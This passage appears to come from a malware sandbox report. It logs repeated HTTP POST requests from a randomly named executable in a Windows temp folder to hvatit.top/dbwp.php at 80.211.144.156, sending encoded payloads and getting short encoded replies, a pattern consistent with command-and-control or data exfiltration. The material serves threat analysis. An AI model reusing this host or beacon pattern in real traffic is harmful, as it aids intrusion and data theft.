                                                        85192.168.2.44982280.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:33:21.633122921 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:21.989938021 CEST2560OUTData Raw: 5a 55 5c 55 5a 58 50 53 5d 5f 54 57 54 5f 5b 57 5a 55 59 5b 52 5d 54 5a 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: ZU\UZXPS]_TWT_[WZUY[R]TZQ\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY-&!<:4V#- \-/0 ;U0(Q'#_$-9(]/Y< /!]'/Z,


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        86192.168.2.44982380.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:33:22.245878935 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 1436
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:22.599284887 CEST1436OUTData Raw: 5a 5e 59 5e 5f 5a 55 51 5d 5f 54 57 54 5e 5b 53 5a 5c 59 5b 52 53 54 5c 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: Z^Y^_ZUQ]_TWT^[SZ\Y[RST\Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.['1*B<)'6>,:8#4S$9$'&''-2<8/<W/!]'/Z,=
                                                        Aug 31, 2024 09:33:22.946997881 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:23.075532913 CEST308INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:22 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 152
                                                        Connection: keep-alive
                                                        Data Raw: 0c 15 20 0d 33 06 2e 57 37 15 31 0f 3d 3c 2e 0d 33 30 23 5a 38 0f 26 13 29 29 33 12 29 14 20 1d 25 3e 30 5e 25 28 29 0e 25 06 24 1e 25 34 21 5b 07 10 21 00 25 3e 01 59 3b 12 04 12 26 20 26 00 21 31 0b 07 2a 03 00 00 35 3b 25 5d 33 28 2e 50 2f 07 36 50 3f 2d 2c 03 2a 06 3f 06 32 28 2b 50 00 12 25 0e 24 3f 38 1c 35 2e 0b 01 22 01 23 10 24 1b 0d 1d 34 15 01 03 29 2b 35 57 30 3c 25 0c 21 20 0f 5e 25 22 3e 14 28 10 0e 0a 2a 16 26 5d 2e 01 23 56 02 36 59 56
                                                        Data Ascii: 3.W71=<.30#Z8&))3) %>0^%()%$%4![!%>Y;& &!1*5;%]3(.P/6P?-,*?2(+P%$?85."#$4)+5W0<%! ^%">(*&].#V6YV


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        87192.168.2.44982480.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:33:22.369270086 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:22.724400997 CEST2560OUTData Raw: 5f 5d 59 51 5f 58 50 53 5d 5f 54 57 54 5c 5b 56 5a 56 59 5e 52 50 54 5c 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: _]YQ_XPS]_TWT\[VZVY^RPT\Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.\'W.A(*4V5>/9<#];'7$%'[$[%?;'\=,/,!]'/Z,5
                                                        Aug 31, 2024 09:33:23.077832937 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:23.212593079 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:22 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        88192.168.2.44982580.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:33:23.349055052 CEST218OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Aug 31, 2024 09:33:23.692984104 CEST2560OUTData Raw: 5a 59 59 53 5f 5a 50 56 5d 5f 54 57 54 59 5b 5c 5a 5d 59 5e 52 57 54 5d 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: ZYYS_ZPV]_TWTY[\Z]Y^RWT]Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.06E++54-,4 T3)(U&6+'.W?X=<+;?!]'/Z,!
                                                        Aug 31, 2024 09:33:24.015029907 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:24.144100904 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:23 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        89192.168.2.44982680.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:33:24.272403002 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:24.630479097 CEST2560OUTData Raw: 5a 59 59 56 5a 5a 50 5c 5d 5f 54 57 54 5b 5b 50 5a 57 59 5c 52 53 54 58 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: ZYYVZZP\]_TWT[[PZWY\RSTXQ\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY-'22<)!(9?0#88'4Q0($=?;;_+R,!]'/Z,)
                                                        Aug 31, 2024 09:33:24.951540947 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:25.081434011 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:24 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        90192.168.2.44982780.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:33:25.209431887 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:25.568027973 CEST2560OUTData Raw: 5a 5f 5c 55 5a 58 55 57 5d 5f 54 57 54 50 5b 54 5a 52 59 5e 52 52 54 5c 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: Z_\UZXUW]_TWTP[TZRY^RRT\Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.]31%?,V".?3X7;0$+'-.+,(,?,?!]'/Z,
                                                        Aug 31, 2024 09:33:25.874866009 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:26.067982912 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:25 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        91192.168.2.44982880.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:33:26.197001934 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:26.552320004 CEST2560OUTData Raw: 5a 5c 59 53 5a 5e 50 56 5d 5f 54 57 54 5e 5b 50 5a 52 59 52 52 55 54 5c 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: Z\YSZ^PV]_TWT^[PZRYRRUT\Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.Z0B<)+67:7Z";$$98$%80.S+?_??4//!]'/Z,=
                                                        Aug 31, 2024 09:33:26.868720055 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:27.065861940 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:26 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        92192.168.2.44982980.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:33:27.193705082 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:27.552376986 CEST2560OUTData Raw: 5a 5c 59 53 5f 59 55 52 5d 5f 54 57 54 5a 5b 50 5a 54 59 5b 52 53 54 59 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: Z\YS_YUR]_TWTZ[PZTY[RSTYQ\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.06(9#>;-(4;$&);'6(3=?+;Y?4,!]'/Z,-
                                                        Aug 31, 2024 09:33:27.864839077 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:27.997514009 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:27 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        93192.168.2.44983080.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:33:28.089951038 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 1436
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        94192.168.2.44983180.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:33:28.118786097 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:28.474229097 CEST2560OUTData Raw: 5a 5a 59 51 5a 58 50 55 5d 5f 54 57 54 5d 5b 53 5a 5c 59 52 52 51 54 5d 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: ZZYQZXPU]_TWT][SZ\YRRQT]Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY-0W.?_#6='.;Z400/_0:++=,'S,!]'/Z,1
                                                        Aug 31, 2024 09:33:28.782859087 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:28.983263969 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:28 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        95192.168.2.44983280.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:33:29.118393898 CEST218OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2552
                                                        Expect: 100-continue
                                                        Aug 31, 2024 09:33:29.474225044 CEST2552OUTData Raw: 5f 58 5c 56 5f 59 55 52 5d 5f 54 57 54 58 5b 51 5a 5c 59 5c 52 51 54 59 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: _X\V_YUR]_TWTX[QZ\Y\RQTYQ\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.$.<),T#>,]9<4'+3%[$=%?(;??',?!]'/Z,1
                                                        Aug 31, 2024 09:33:29.893752098 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:30.029486895 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:29 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        96192.168.2.44983380.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:33:30.147797108 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2552
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:30.505487919 CEST2552OUTData Raw: 5a 54 59 54 5f 5e 55 57 5d 5f 54 57 54 58 5b 52 5a 57 59 5c 52 53 54 5f 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: ZTYT_^UW]_TWTX[RZWY\RST_Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.31<*#"8./8 ?'\(U$/^$[:<$(?'U/!]'/Z,=
                                                        Aug 31, 2024 09:33:30.830562115 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:31.026269913 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:30 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        97192.168.2.44983480.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:33:31.162514925 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:31.521192074 CEST2560OUTData Raw: 5a 5c 59 50 5f 5a 50 53 5d 5f 54 57 54 5f 5b 53 5a 5d 59 5e 52 51 54 58 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: Z\YP_ZPS]_TWT_[SZ]Y^RQTXQ\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY-3!*=*(S!8.?;[#7&:'3$$-&+(#<,;S./!]'/Z,
                                                        Aug 31, 2024 09:33:31.849621058 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:31.983861923 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:31 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        98192.168.2.44983580.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:33:32.122637987 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:32.474220037 CEST2560OUTData Raw: 5a 5f 59 56 5a 59 55 52 5d 5f 54 57 54 5b 5b 56 5a 5c 59 5c 52 5d 54 52 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: Z_YVZYUR]_TWT[[VZ\Y\R]TRQ\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.Y$2*(94V"-<[9$ (S0;&%;0:V(Y?'8!]'/Z,)
                                                        Aug 31, 2024 09:33:32.787709951 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:32.915862083 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:32 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        99192.168.2.44983680.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:33:33.037760019 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        100192.168.2.44983780.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:33:33.122359991 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 1436
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:33.474445105 CEST1436OUTData Raw: 5a 5c 59 5e 5a 54 50 51 5d 5f 54 57 54 5f 5b 5c 5a 5c 59 52 52 5c 54 53 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: Z\Y^ZTPQ]_TWT_[\Z\YRR\TSQ\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.[02B?8!X<]-?,4;#'*8Q'%<'=S<;<<?8?!]'/Z,
                                                        Aug 31, 2024 09:33:33.786036015 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:33.987014055 CEST308INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:33 GMT
                                                        Content-Type: text/html; charset=UTF-8
